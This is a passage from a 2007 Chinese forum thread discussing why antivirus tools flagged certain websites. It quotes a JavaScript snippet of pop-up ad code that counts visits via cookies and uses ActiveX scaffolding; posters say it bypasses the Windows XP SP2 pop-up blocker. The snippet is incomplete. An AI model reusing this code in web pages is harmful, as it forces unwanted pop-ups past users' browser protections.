// document.cookie and runs to the next ';' (or the end of the string).
function getCookieVal(offset) {
  var jar = document.cookie;
  var end = jar.indexOf(";", offset);
  if (end < 0) {
    end = jar.length;
  }
  return unescape(jar.substring(offset, end));
}
// Entry point: fires the pop-up only when amt() reports the first visit
// (count 1). It also tries to queue "openWindowBack()" on aryADSeq, which is
// not defined anywhere in this script; when that throws, openWindowBack()
// simply runs a second time.
function btpop(){
  if (amt() != 1) {
    return;
  }
  openWindowBack();
  try {
    aryADSeq.push("openWindowBack()");
  } catch (e) {
    openWindowBack();
  }
}
// Trims myurl (location.href + '/') down to its origin — everything before the
// first '/' at or after index 8, i.e. past the scheme — falling back to '.'
// when no such slash exists, then writes the ActiveX scaffolding and dispatches.
function openWindowBack() {
  var originEnd = myurl.indexOf('/', 8);
  myurl = myurl.substring(0, originEnd);
  if (myurl === '') {
    myurl = '.';
  }
  setupActiveX();
  loadingPop();
}
btpop()  // kicks everything off at parse time (document.write in setupActiveX needs that)


Oceanzd
 楼主| 发表于 2007-1-16 08:56:10 | 显示全部楼层

回复 #5 没注册 的帖子

专业的解释不一样哈
chow2006
发表于 2007-1-16 13:14:42 | 显示全部楼层
原帖由 没注册 于 2007-1-16 08:47 发表
www.vipcn.com  未被挂马

www.ting88.com  也未带病毒

之所以报的原因是因为www.vipcn.com 使用了一个恶意弹窗代码,该代码可以突破SP2,实现每24小时弹窗一次。

代码如下:



现在流氓和木马的界线越来越模糊了